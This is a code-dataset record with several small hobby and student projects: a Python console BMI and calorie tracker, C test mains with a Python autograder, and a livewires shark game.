:) \\n\")\n\n if dataOptions[x]['dataOptions'][\"initialWeightGoal\"] == \"maintain\":\n def loadinitialDataForMaintain():\n a = os.listdir()\n if \"datas.json\" in a:\n with open('datas.json', 'r') as file:\n datas = json.load(file)\n\n user_initialDataForMaintain = datas[\"initialDataForMaintain\"]\n return user_initialDataForMaintain\n\n user_initialDataForMaintain = loadinitialDataForMaintain()\n\n print(\"\\nDear User, you're going to answer for the following: \",\n (\" , \").join(user_initialDataForMaintain.keys()), \"\\n\")\n initial = {x: {\"initialData\": {}}}\n print(\n \"\\nInput you height in the integer form in cm, and your weight in kg.\")\n for key in user_initialDataForMaintain:\n while True:\n inputt = input(\"your \" + key + \"is : \")\n if inputt.isnumeric():\n inputt = int(inputt)\n initial[x][\"initialData\"][key] = inputt\n break\n else:\n print(\"\\n please try again. Answer in the form of the integers mentioned above.\")\n return initial\n\n elif dataOptions[x][\"dataOptions\"][\"initialWeightGoal\"] == \"lose\":\n def loadinitialDataForLose():\n a = os.listdir()\n if \"datas.json\" in a:\n with open('datas.json', 'r') as file:\n datas = json.load(file)\n user_initialDataForLose = datas[\"initialDataForLose\"]\n return user_initialDataForLose\n\n user_initialDataForLose = loadinitialDataForLose()\n\n print(\"\\nDear User, you're going to answer for the following : \",\n (\" , \").join(user_initialDataForLose.keys()))\n initial = {x: {\"initialData\": {}}}\n print(\n \"\\nInput height in the integer form in cm, and weight in kg\")\n\n for key in user_initialDataForLose:\n while True:\n inputt = input(\"your \" + key + \" is : \")\n try:\n inputt = float(inputt)\n initial[x][\"initialData\"][key] = inputt\n break\n except ValueError as e:\n print(\"\\nplease try again. Answer in the form mentioned above.\")\n return initial\n\n elif dataOptions[x][\"dataOptions\"][\"initialWeightGoal\"] == \"gain\":\n def loadinitialDataForGain():\n a = os.listdir()\n if \"datas.json\" in a:\n with open('datas.json', 'r') as file:\n datas = json.load(file)\n user_initialDataForGain = datas[\"initialDataForGain\"]\n return user_initialDataForGain\n\n user_initialDataForGain = loadinitialDataForGain()\n\n print(\"\\nDear User, you're going to answer for the following:\",\n (\" , \").join(user_initialDataForGain.keys()))\n initial = {x: {\"initialData\": {}}}\n print(\"\\nInput you height in the integer form in CM, and your weight in KG. \\n \")\n for key in user_initialDataForGain:\n while True:\n inputt = input(\"your \" + key + \" is : \")\n try:\n inputt = float(inputt)\n initial[x][\"initialData\"][key] = inputt\n break\n except ValueError as e:\n print(\"\\nplease try again. Answer in the form of the integers mentioned above. \\n\")\n return initial\n\n\ndef SaveInitial(x, initial):\n a = os.listdir()\n if \"users.json\" in a:\n with open('users.json') as file1:\n initialold = json.load(file1)\n initialold[x].update(initial[x])\n file = open('users.json', 'w')\n file.write(json.dumps(initialold))\n file.close()\n\ndef CalculatingBMI(x):\n a = open(\"users.json\", \"r\")\n BMIfacts = json.load(a)\n h = int(BMIfacts[x][\"initialData\"][\"height\"])\n w = int(BMIfacts[x][\"initialData\"][\"initialWeight\"])\n BMI = float(w * 10000 / ((h * h)))\n BMI= \"{:.2f}\".format(BMI)\n print(\"\\nYour BMI is:\", BMI )\n if float(BMI) < 18.5:\n print(\"\\nDear user, your BMI indicated that you're underweight.The normla range is between 18.5-24.9.\")\n print(\"We suggest you choose the gaining goal if you haven't chosen that. \")\n elif float(BMI) > 18.5 and float(BMI) < 25:\n print(\n \"\\nDear user, your BMI indicated that you're in the normal weight range!The normla range is between 18.5-24.9 \")\n print(\"We suggest you choose the maintaining goal if you haven't chosen that.\")\n elif float(BMI) > 25 and float(BMI) < 30:\n print(\n \"\\nDear user, your BMI indicated that you're in the overweight range.The normla range is between 18.5-24.9\")\n print(\"We suggest you choose the losing goal if you haven't chosen that.\")\n\n\ndef CalculatingBMR(x):\n a = open(\"users.json\", \"r\")\n BMR = json.load(a)\n h = int(BMR[x][\"initialData\"][\"height\"])\n w = int(BMR[x][\"initialData\"][\"initialWeight\"])\n a = int(BMR[x][\"initialData\"][\"Age\"])\n if BMR[x]['dataOptions'][\"initialWeightGoal\"] == \"maintain\":\n if BMR[x]['dataOptions'][\"gender\"] == \"male\":\n CalorieIn = float(10 * w + 6.25 * h - 5 * a + 5)\n CalorieIn = \"{:.2f}\".format(CalorieIn)\n print(\"\\nYou should eat:\", CalorieIn, \"CaloriesPer day, to maintain your current weight :) \\n\")\n elif BMR[x]['dataOptions'][\"gender\"] == \"female\":\n CalorieIn = float(10 * w + 6.25 * h - 5 * a - 161)\n CalorieIn = \"{:.2f}\".format(CalorieIn)\n print(\"\\nYou should eat:\", CalorieIn, \"Calories Per day, to maintain your current weight :) \\n\")\n if BMR[x]['dataOptions'][\"initialWeightGoal\"] == \"lose\":\n lose = int(BMR[x][\"initialData\"][\"Weight_You_Want_To_Lose_Per_Week\"])\n if BMR[x]['dataOptions'][\"gender\"] == \"male\":\n CalorieIn = float(10 * w + 6.25 * h - 5 * a + 5 - (lose * 3500) / 7)\n CalorieIn = \"{:.2f}\".format(CalorieIn)\n print(\"\\nYou should eat:\", CalorieIn, \"Calories Per day, to lose\", lose,\n \" Kgs from your current weight per week:)\\nWe suggest you to use the 'FitnessPall' application to track your calories.\\nYou simply input your consumed food and it calculates the calories.\")\n if BMR[x]['dataOptions'][\"gender\"] == \"female\":\n CalorieIn = float(10 * w + 6.25 * h - 5 * a - 161 - (lose * 3500) / 7)\n CalorieIn = \"{:.2f}\".format(CalorieIn)\n print(\"\\nYou should eat:\", CalorieIn, \"Calories Per day, to lose\", lose,\n \" Kgs from your current weight per week:)\\nsuggest you to use the 'FitnessPall' application to track your calories.\\nYou simply input your consumed food and it calculates the calories.\")\n if BMR[x]['dataOptions'][\"initialWeightGoal\"] == \"gain\":\n gain = int(BMR[x][\"initialData\"][\"Weight_You_Want_To_Gain_Per_Week\"])\n if BMR[x]['dataOptions'][\"gender\"] == \"male\":\n CalorieIn = float(10 * w + 6.25 * h - 5 * a + 5 + (gain * 3500) / 7)\n CalorieIn=\"{:.2f}\".format(CalorieIn)\n print(\"\\nYou should eat:\", CalorieIn, \"Calorie Per day, to gain\", gain,\n \" Kgs from your current weight per week:)\\nsuggest you to use the 'FitnessPall' application to track your calories.\\nYou simply input your consumed food and it calculates the calories.\")\n if BMR[x]['dataOptions'][\"gender\"] == \"female\":\n CalorieIn = float(10 * w + 6.25 * h - 5 * a - 161 + (gain * 3500) / 7)\n CalorieIn = \"{:.2f}\".format(CalorieIn)\n print(\"\\nYou should eat:\", CalorieIn, \"Calories Per day, to gain\", gain,\n \" Kgs from your current weight per week:)\\nsuggest you to use the 'FitnessPall' application to track your calories.\\nYou simply input your consumed food and it calculates the calories. \")\n\n\ndef TipOfTheDay():\n with open('datas.json', 'r') as file:\n tips = json.load(file)\n dailytips = tips[\"TipsOfTheDay\"]\n j=random.choices(tips[\"TipsOfTheDay\"][\"aidDigestion\"])\n w=random.choices(tips[\"TipsOfTheDay\"][\"essentialOils\"])\n print(\"\\nToday's Tip of the day is :\", ', '.join(j))\n print(\"\\nand a fact about essential oils is:\",', '.join(w))\n print(\"Dear user, thank you for using HealthyWeight :) Hope to see you soon!\")\n\n\ndef NewUser():\n user_options = loadOptions()\n username, options = AskForDataOptions(user_options)\n SaveOptions(options)\n initial = AskForinitialData(username)\n SaveInitial(username, initial)\n CalculatingBMI(username)\n CalculatingBMR(username)\n TipOfTheDay()\n\n\ndef Save_New_Data(New_Weight, name):\n with open(\"users.json\") as a:\n load = json.load(a)\n load[name][\"initialData\"][\"initialWeight\"] = New_Weight\n file = open('users.json', 'w')\n file.write(json.dumps(load))\n file.close()\n\ndef Create_New_Username():\n print(\"\\nFile doesn't exist! so you do not have an account :(. \")\n create = input(\"\\nDo you want to create a new account? Please answer in yes or no .\")\n while True:\n if create == \"yes\":\n NewUser()\n break\n elif create == \"no\":\n print(\"\\nokey See you next time :)\")\n break\n else:\n print(\"\\nplease answer in yes or no form.\")\n\ndef CheckIfGoalisReached(New_Weight, name , Old_Weight):\n difference = New_Weight - Old_Weight\n with open(\"users.json\") as a:\n load = json.load(a)\n Goal = load[name][\"dataOptions\"][\"initialWeightGoal\"]\n if difference > 0 and (Goal ==\"maintain\" or Goal==\"lose\"):\n print(\"\\nDear user, you have gained : \", difference , \"Kgs since we last saw you. You have to work harder to reach your goal\\nwhich was to\", Goal,\" weight.\\nWork harder you'll reach there\")\n if difference >0 and Goal ==\"gain\":\n print(\"\\nDear user, you have gained : \" , difference, \"Kgs since we last saw you !\\nYou're on the right track as your goal was to \", Goal, \"your weight :) Keep on going :)\")\n if difference <0 and (Goal ==\"maintain\" or Goal==\"gain\"):\n print(\"\\nDear user, you have lost: \", abs(difference),\n \"Kgs since we last saw you. You have to work harder to reach your goal\\nwhich was to gain weight.\\nWork harder you'll reach there\")\n if difference <0 and Goal ==\"lose\":\n print(\"\\nDear user, you have lost : \", abs(difference),\n \"Kgs since we last saw you !\\nYou're on the right track as your goal was to lose\"\n \"weight :) Keep on going :)\")\n\ndef Load_Old_Data(name):\n with open(\"users.json\") as a:\n load = json.load(a)\n Old_Weight = load[name][\"initialData\"][\"initialWeight\"]\n print('Your initial weight was : ', Old_Weight)\n while True:\n change = input(\"Do you want to change it? Please answer in yes or no : \")\n if change == \"yes\":\n while True:\n New_Weight = input(\"Insert your current weight in kg in numeric integer form : \")\n if New_Weight.isnumeric():\n New_Weight = int(New_Weight)\n CheckIfGoalisReached(New_Weight, name, Old_Weight)\n Save_New_Data(New_Weight, name)\n TipOfTheDay()\n break\n else:\n print(\"\\nPlease write in kg in a numeric integer form:(\")\n break\n elif change == \"no\":\n print(\"Okey you can change it whenever you want :) \\n\")\n TipOfTheDay()\n break\n else:\n print(\"\\nPlease try it again and answer in the form of yes or no :)\")\ndef UsernameisNone():\n while True:\n end = input(\"\\nSory this username doesn't exist. Type 0 to end the Application\\nType 1 to create a new username.\")\n if end.isnumeric():\n end=int(end)\n if end==0:\n print(\"\\nDear user, thank you for using HealthyWeight :) Hope to see you soon!\")\n break\n elif end==1:\n NewUser()\n break\n else:\n print(\"please input an INTEGER.\")\n\ndef OldUser():\n a = os.listdir()\n if \"users.json\" in a:\n with open(\"users.json\") as file:\n user = json.load(file)\n while True:\n name = input(\"\\nplease type your previously created username : \")\n if user.get(name) is None:\n UsernameisNone()\n else:\n Load_Old_Data(name)\n break\n else:\n Create_New_Username()\n\ndef Check():\n print(\"\\nThis Application helps you reach your weight goal. :)\")\n while True:\n MAIN = input(\"Have you used our app before? Please answer in yes or no : \")\n if MAIN == \"no\":\n NewUser()\n break\n elif MAIN == \"yes\":\n OldUser()\n break\n else:\n print(\"\\nsorry Try again!Please type yes or no.(not capital)\")\n\ndef MAIN():\n Check()\nMAIN()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.7857142686843872,
"alphanum_fraction": 0.7857142686843872,
"avg_line_length": 34,
"blob_id": "c503a1b035871ee1702827b77fddfecf5942837c",
"content_id": "78c6f74166c58acb2f7760bdf801e46bacf3abe9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 70,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 2,
"path": "/README.md",
"repo_name": "shantaladajian/HealthyWeight",
"src_encoding": "UTF-8",
"text": "# HealthyWeight\nThis Application helps you reach your weight goal. :)\n"
}
] | 2 |
ensaicluster/Corrections
|
https://github.com/ensaicluster/Corrections
|
6d173fd61f117757acbae1316454c8bb36aa1dcc
|
9eb148182df16599ae23b2ca5620dc226d740d4c
|
b996ab217d72d7a2ac184a04ef14162e0ff28f5d
|
refs/heads/master
| 2020-03-24T00:33:22.248655 | 2018-09-25T10:59:09 | 2018-09-25T10:59:09 | 142,296,235 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4893617033958435,
"alphanum_fraction": 0.5531914830207825,
"avg_line_length": 14.777777671813965,
"blob_id": "25b9b7cd729f597e56e92a3ab6b995bd54968c25",
"content_id": "11cc68392de6ec1d60c0ca9f6b4fdabee089b4fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 141,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 9,
"path": "/CellularX/Correction/MainTest/main8.c",
"repo_name": "ensaicluster/Corrections",
"src_encoding": "UTF-8",
"text": "void ct_cellularx(int cells[], int taille, int t);\n\nint main()\n{\n int tab[] = {0, 0, 0, 1, -1};\n \n ct_cellularx(tab, 5, 10);\n return 0;\n}"
},
{
"alpha_fraction": 0.4553571343421936,
"alphanum_fraction": 0.5535714030265808,
"avg_line_length": 11.55555534362793,
"blob_id": "f761547714d368998d114e11e0d35109f1a5ed8d",
"content_id": "b164be92160ad5f8456b70abfbe92308e5467e1e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 112,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 9,
"path": "/AliceWeederland/Correction/MainTest/main7.c",
"repo_name": "ensaicluster/Corrections",
"src_encoding": "UTF-8",
"text": "void ct_alice(int tab[], int);\n\nint main()\n{\n\tint test7[3] = {397, 0, 38};\n \n\tct_alice(test7, 3);\n\treturn 0;\n}"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5490196347236633,
"avg_line_length": 10.44444465637207,
"blob_id": "2c85c6ef9e16f32322bb9d04a15dc57f17b6a926",
"content_id": "ad4a4e16aaed81451049d5049228be9eb27922cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 102,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 9,
"path": "/AliceWeederland/Correction/MainTest/main6.c",
"repo_name": "ensaicluster/Corrections",
"src_encoding": "UTF-8",
"text": "void ct_alice(int tab[], int);\n\nint main()\n{\n\tint test6[0] = {};\n \n\tct_alice(test6, 0);\n\treturn 0;\n}"
},
{
"alpha_fraction": 0.5538912415504456,
"alphanum_fraction": 0.5845001339912415,
"avg_line_length": 32.39130401611328,
"blob_id": "e4cfe52ebefea4a86286ffb06246d7f31a85e751",
"content_id": "e7b49431c2e7bc6a8b71ce6e69b0b1f4798e6f01",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3071,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 92,
"path": "/Georgette.py",
"repo_name": "ensaicluster/Corrections",
"src_encoding": "UTF-8",
"text": "import os\n\nclass Parser:\n def __init__(self, fichier):\n self.proj_name = \"\"\n self.nb_std_tests = 0\n self.nb_err_tests = 0\n self.tests = list()\n try:\n with open(fichier, 'r') as fd:\n self.lines = fd.readlines()\n self.read = 1\n except:\n print(\"Erreur: impossible d'ouvrir le fichier correction.\")\n self.read = 0\n \n def get_value(self, l):\n current_line = self.lines[l]\n words = current_line.split(\"=\")\n words[1] = words[1].rstrip('\\n')\n return(words[1])\n \n def aff_details(self):\n print(\"#\"*50)\n print(\" \"*(25-(len(self.proj_name)/2))+self.proj_name)\n print(\"#\"*50)\n print(\"NOTATION : \"+str(self.nb_std_tests)+\" tests standards, \"+str(self.nb_err_tests)+\" tests d'erreurs.\") \n \n def start(self):\n if (self.read == 1):\n proj_infos = []\n for i in range(3):\n proj_infos.append(self.get_value(i))\n self.proj_name = proj_infos[0]\n self.nb_std_tests = int(proj_infos[1])\n self.nb_err_tests = int(proj_infos[2])\n for i in range(self.nb_std_tests + self.nb_err_tests):\n self.tests.append(list())\n for j in range(3):\n self.tests[i].append(self.get_value(j+4+(i*3)))\n self.aff_details()\n\nclass Test:\n def __init__(self, current_test, test_nb):\n self.test_nb = test_nb\n self.name = current_test[0]\n self.pts = int(current_test[1])\n self.tested_values = current_test[2]\n self.outfile = \"out\"+str(self.test_nb)\n self.corrfile = \"Correction/corrtest\"+str(self.test_nb)\n \n def aff_test(self):\n print(\"_\"*50+\"\\n\")\n print(\"## \"+self.name)\n print(\"## Note sur : \"+str(self.pts)+\" points\")\n print(\"## Valeurs de test : \"+self.tested_values)\n \n def do_test(self):\n pts = 0\n print(\"Compilation du projet...\")\n os.system(\"gcc -std=c99 Correction/MainTest/main\"+str(self.test_nb)+\".c *.c\")\n print(\"Ok!\\nTesting...\")\n os.system(\"./a.out > \"+self.outfile)\n res = os.popen(\"diff \"+self.outfile+\" \"+self.corrfile).readlines()\n if len(res) == 0:\n print(\"\\033[92m\"+\"SUCCESS !\"+\"\\033[0m\")\n pts += self.pts\n print(\"Vous avez obtenu \"+\"\\033[92m\"+str(self.pts)+\" points\"+\"\\033[0m\"+\".\")\n else:\n print(\"\\033[91m\"+\"FAILURE !\"+\"\\033[0m\")\n print(\"Vous n'avez pas obtenu \"+\"\\033[91m\"+str(self.pts)+\" points\"+\"\\033[0m\"+\".\")\n return pts\n\n def start(self):\n self.aff_test()\n return self.do_test()\n \ndetails = Parser(\"Correction/correction\")\ndetails.start()\npts = 0\ntotalpts = sum(int(details.tests[i][1]) for i in range(details.nb_std_tests + details.nb_err_tests))\nprint(\"\\n\"+\"#\"*50+\"\\n\"+\"TESTS STANDARDS\\n\"+\"#\"*50)\nfor i in range(details.nb_std_tests):\n testing = Test(details.tests[i], i+1)\n pts += testing.start()\nif (details.nb_err_tests > 0):\n print(\"\\n\"+\"#\"*50+\"\\n\"+\"TESTS DE GESTION D'ERREUR\\n\"+\"#\"*50)\n for j in range(i + 1, details.nb_std_tests + details.nb_err_tests):\n testing = Test(details.tests[j], j+1)\n pts += testing.start()\n \nprint(\"\\n\"+\"#\"*50+\"\\n\"+\"NOTE FINALE : \"+\"\\033[36m\"+str(pts)+\"/\"+str(totalpts)+\" points\"+\"\\033[0m\"+\".\\n\"+\"#\"*50)"
},
{
"alpha_fraction": 0.4146341383457184,
"alphanum_fraction": 0.5447154641151428,
"avg_line_length": 12.777777671813965,
"blob_id": "ded290386e62542312f79e3bdb2453e76e249267",
"content_id": "60ac55adbabb25284e90e0dec1f6c4d9bc388fbd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 123,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 9,
"path": "/AliceWeederland/Correction/MainTest/main1.c",
"repo_name": "ensaicluster/Corrections",
"src_encoding": "UTF-8",
"text": "void ct_alice(int tab[], int);\n\nint main()\n{\n\tint test1[6] = {15, 20, 35, 11, 28, 1};\n \n\tct_alice(test1, 6);\n\treturn 0;\n}"
},
{
"alpha_fraction": 0.36690646409988403,
"alphanum_fraction": 0.5395683646202087,
"avg_line_length": 14.55555534362793,
"blob_id": "e90c44ae201819480746d80c6c16c02e7685e139",
"content_id": "32095450df9bd6dae88ccd5cd1a15a529b5a6489",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 139,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 9,
"path": "/AliceWeederland/Correction/MainTest/main2.c",
"repo_name": "ensaicluster/Corrections",
"src_encoding": "UTF-8",
"text": "void ct_alice(int tab[], int);\n\nint main()\n{\n\tint test2[10] = {11, 12, 22, 29, 31, 27, 7, 9, 2, 37};\n \n\tct_alice(test2, 10);\n\treturn 0;\n}"
},
{
"alpha_fraction": 0.47663551568984985,
"alphanum_fraction": 0.5514018535614014,
"avg_line_length": 11,
"blob_id": "5d186b567ea2716bef790ce7ecb9eed13df4fbd0",
"content_id": "596d690e334f8f5092e9fbd65528cdc455b27927",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 107,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 9,
"path": "/AliceWeederland/Correction/MainTest/main4.c",
"repo_name": "ensaicluster/Corrections",
"src_encoding": "UTF-8",
"text": "void ct_alice(int tab[], int);\n\nint main()\n{\n\tint test4[2] = {1, 37};\n \n\tct_alice(test4, 2);\n\treturn 0;\n}"
},
{
"alpha_fraction": 0.36690646409988403,
"alphanum_fraction": 0.5395683646202087,
"avg_line_length": 14.55555534362793,
"blob_id": "2f317b6e68e97ad4e55bdb22245c4b4c80ed5589",
"content_id": "8fc867a72ab6263e84af924a951ccaddb570e31b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 139,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 9,
"path": "/AliceWeederland/Correction/MainTest/main3.c",
"repo_name": "ensaicluster/Corrections",
"src_encoding": "UTF-8",
"text": "void ct_alice(int tab[], int);\n\nint main()\n{\n\tint test3[10] = {13, 10, 6, 3, 32, 25, 18, 21, 23, 1};\n \n\tct_alice(test3, 10);\n\treturn 0;\n}"
},
{
"alpha_fraction": 0.2771739065647125,
"alphanum_fraction": 0.52173912525177,
"avg_line_length": 19.55555534362793,
"blob_id": "6210d32bb5e784089bb2cc99f1aec287b9f13801",
"content_id": "002f55c77caa27afbfbb9e516695f5d85a9d9e1a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 184,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 9,
"path": "/AliceWeederland/Correction/MainTest/main5.c",
"repo_name": "ensaicluster/Corrections",
"src_encoding": "UTF-8",
"text": "void ct_alice(int tab[], int);\n\nint main()\n{\n\tint test5[22] = {20, 21, 23, 24, 26, 28, 32, 34, 35, 36, 4, 5, 6, 8, 10, 13, 15, 16, 18, 17, 6, 1};\n \n\tct_alice(test5, 22);\n\treturn 0;\n}"
},
{
"alpha_fraction": 0.45695364475250244,
"alphanum_fraction": 0.5364238619804382,
"avg_line_length": 15.88888931274414,
"blob_id": "c2460c6c759bf1492cbe4d0bf0de1adb41a65ba9",
"content_id": "1ffa4d931a0a8013eb45d595e8d10d4be897bc09",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 151,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 9,
"path": "/CellularX/Correction/MainTest/main1.c",
"repo_name": "ensaicluster/Corrections",
"src_encoding": "UTF-8",
"text": "void ct_cellularx(int cells[], int taille, int t);\n\nint main()\n{\n int tab[] = {0, 0, 0, 0, 1, 0, 0, 0, 0};\n \n ct_cellularx(tab, 9, 5);\n return 0;\n}"
},
{
"alpha_fraction": 0.5036496520042419,
"alphanum_fraction": 0.5620437860488892,
"avg_line_length": 14.333333015441895,
"blob_id": "199f4febfb22438f94eac3cd3d0355ab624e0567",
"content_id": "25ec628de52d5fc2e41f10463f68a2eca8b5fdd4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 137,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 9,
"path": "/CellularX/Correction/MainTest/main3.c",
"repo_name": "ensaicluster/Corrections",
"src_encoding": "UTF-8",
"text": "void ct_cellularx(int cells[], int taille, int t);\n\nint main()\n{\n int tab[] = {0, 1, 1, 0};\n \n ct_cellularx(tab, 4, 15);\n return 0;\n}"
},
{
"alpha_fraction": 0.4811320900917053,
"alphanum_fraction": 0.5471698045730591,
"avg_line_length": 10.88888931274414,
"blob_id": "3cc6f3035307be221f32ebf9704574988f2eec57",
"content_id": "30cba61e8590750ad5aa4ae2e39dfd629ab14748",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 106,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 9,
"path": "/AliceWeederland/Correction/MainTest/main8.c",
"repo_name": "ensaicluster/Corrections",
"src_encoding": "UTF-8",
"text": "void ct_alice(int tab[], int);\n\nint main()\n{\n\tint test8[2] = {1, 8};\n \n\tct_alice(test8, 2);\n\treturn 0;\n}"
}
] | 12 |
mnajib2018/Python-Graphics-Ocean-Shark-Attack-
|
https://github.com/mnajib2018/Python-Graphics-Ocean-Shark-Attack-
|
5a21be62e5d78fd1ef7f70e84c1375a9811cc068
|
5ae1389aa7d4cfbbc9099e81e281bd0e1cf9bfc5
|
7bb0c98f1130ce21c8aa9db66decc144161e4ba7
|
refs/heads/master
| 2021-01-10T06:47:01.481889 | 2015-12-24T21:20:46 | 2015-12-24T21:20:46 | 48,557,059 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.3541905879974365,
"alphanum_fraction": 0.36289703845977783,
"avg_line_length": 34.0363655090332,
"blob_id": "63080cbc9d95888c26ad843838a491311183a92a",
"content_id": "3e09c13900b640068e2c3dfd5114326c2eb964f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10453,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 220,
"path": "/shark_attack.py",
"repo_name": "mnajib2018/Python-Graphics-Ocean-Shark-Attack-",
"src_encoding": "UTF-8",
"text": "#Final Project: Deadly Shark Attack\n#By Muhammad Najib\n#Preview of game\n#As a deadly Shark, you have to eat all the fish in the pond,\n#Move arrow keys to move the shark. If purple fish is eaten, two yellow fishes are born,\n#If a yellow fish is eaten, a starfish is born, but eating starfish doesn´t result in a new fish\n#Each fish is worth 10 points. Game ends once all fishes have been eaten.\n\nimport random, math\nfrom livewires import games, color\n\n#make a screen with the mentioned width and height\ngames.init(screen_width = 800, screen_height = 600, fps = 50)\n\n\nclass Fish(games.Sprite):\n \"\"\" A fish which floats across the screen. \"\"\"\n #Three different sizes for fish and each has different type/color\n SMALL = 1\n MEDIUM = 2\n LARGE = 3\n images = {SMALL : games.load_image(\"starfish.jpg\"),\n MEDIUM : games.load_image(\"Yellowfish.jpg\"),\n LARGE : games.load_image(\"Purplefish.png\") }\n #Common value for speed and offspring of a fish\n SPEED = 10\n SPAWN = 2\n \n def __init__(self, x, y, size):\n \"\"\" Initialize fish sprite. \"\"\"\n #Takes value of x, y and size from main func\n super(Fish, self).__init__(\n image = Fish.images[size],\n x = x, y = y,\n dx = random.choice([1, -1]) * Fish.SPEED * random.random()/size, \n dy = random.choice([1, -1]) * Fish.SPEED * random.random()/size)\n \n self.size = size\n\n def update(self):\n \"\"\" Wrap around screen. \"\"\" \n if self.top > games.screen.height:\n self.bottom = 0\n \n if self.bottom < 0:\n self.top = games.screen.height\n\n if self.left > games.screen.width:\n self.right = 0\n\n if self.right < 0:\n self.left = games.screen.width\n\n\n\n def die(self):\n \"\"\" Destroy fish. \"\"\"\n # if fish isn't smallest, replace with two smaller fishes\n if self.size != Fish.SMALL:\n for i in range(Fish.SPAWN):\n \n new_fish = Fish(x = random.randrange(games.screen.width),\n y = random.randrange(games.screen.height),\n size = self.size - 1)\n games.screen.add(new_fish)\n self.destroy()\n\n \n\n\n\nclass Shark(games.Sprite):\n \"\"\" The player's shark. \"\"\"\n image = games.load_image(\"Shark.bmp\")\n\n #Rotation step and velocity steps are used in seperate funcs below\n ROTATION_STEP = 20\n VELOCITY_STEP = 5\n \n\n def __init__(self, x, y):\n \"\"\" Initialize ship sprite. \"\"\"\n super(Shark, self).__init__(image = Shark.image, x = x, y = y)\n self.missile_wait = 0\n self.angle = 90\n \n\n self.score = games.Text(value = 0, size = 25, color = color.black,\n top = 5, right = games.screen.width - 10)\n self.total = games.Text(value = 8, size = 25, color = color.black, top = 5, left = 0)\n games.screen.add(self.score)\n self.start_game()\n #games.screen.add(self.death)\n\n\n def update(self):\n \"\"\" Rotate and thrust based on keys pressed. \"\"\"\n # rotate based on left and right arrow keys\n if games.keyboard.is_pressed(games.K_LEFT):\n self.angle -= Shark.ROTATION_STEP \n if games.keyboard.is_pressed(games.K_RIGHT):\n self.angle += Shark.ROTATION_STEP\n\n # apply thrust based on up arrow key\n if games.keyboard.is_pressed(games.K_UP):\n # change velocity components based on ship's angle\n angle = self.angle * math.pi / 180 # convert to radians\n self.dx += Shark.VELOCITY_STEP* math.sin(angle)\n self.dy += Shark.VELOCITY_STEP* -math.cos(angle)\n\n if games.keyboard.is_pressed(games.K_DOWN):\n #stop the shark from thrusting forward\n self.dx = self.dy = 0\n\n\n # wrap the shark around screen \n if self.top > games.screen.height:\n self.bottom = 0\n \n if self.bottom < 0:\n self.top = games.screen.height\n\n if self.left > games.screen.width:\n self.right = 0\n\n if self.right < 0:\n self.left = games.screen.width \n\n # check if ship overlaps any other object\n if self.overlapping_sprites :\n for sprite in self.overlapping_sprites:\n #every sprite except score and death counter are destroyed on contact\n if sprite != self.score and sprite != self.total:\n sprite.die()\n #Adds 10 to the score\n self.score.value += 10\n self.total.value -= 1\n if sprite.size != Fish.SMALL:\n self.total.value += 2\n if self.total.value == 0:\n self.die()\n self.end_game()\n \n self.score.right = games.screen.width - 10 \n \n\n def die(self):\n \"\"\" Destroy shark. \"\"\"\n self.destroy()\n\n \n def end_game(self):\n \"\"\" End the game. \"\"\"\n end_message = games.Message(value = \"Game Over. Final Score: \",\n size = 90,\n color = color.red,\n x = games.screen.width/2,\n y = games.screen.height/2-90,\n lifetime = 20,\n after_death = games.screen.quit)\n \n end_message_2 = games.Message(value = self.score.value,\n size = 90,\n color = color.red,\n x = games.screen.width/2,\n y = games.screen.height/2,\n lifetime = 20,\n after_death = games.screen.quit)\n games.screen.add(end_message)\n games.screen.add(end_message_2)\n\n def start_game(self):\n start_message = games.Message(value = \"Deadly Shark Attack\"\n \"Press arrow keys to move\",\n size = 50,\n color = color.red,\n x = games.screen.width/2,\n y = games.screen.height/2,\n lifetime = 5,\n )\n games.screen.add(start_message)\n\n\n start_message = games.Message(value = \"Deadly Shark Attack\"\n \"Press arrow keys to move\",\n size = 50,\n color = color.red,\n x = games.screen.width/2,\n y = games.screen.height/2,\n lifetime = 5,\n )\n games.screen.add(start_message)\n \n \n \n\n\ndef main():\n # establish background\n nebula_image = games.load_image(\"Tank.jpg\")\n games.screen.background = nebula_image\n\n # create 8 fishes\n for i in range(8):\n x = random.randrange(games.screen.width)\n y = random.randrange(games.screen.height)\n size = random.choice([Fish.SMALL, Fish.MEDIUM, Fish.LARGE])\n new_fish = Fish(x = x, y = y, size = size)\n 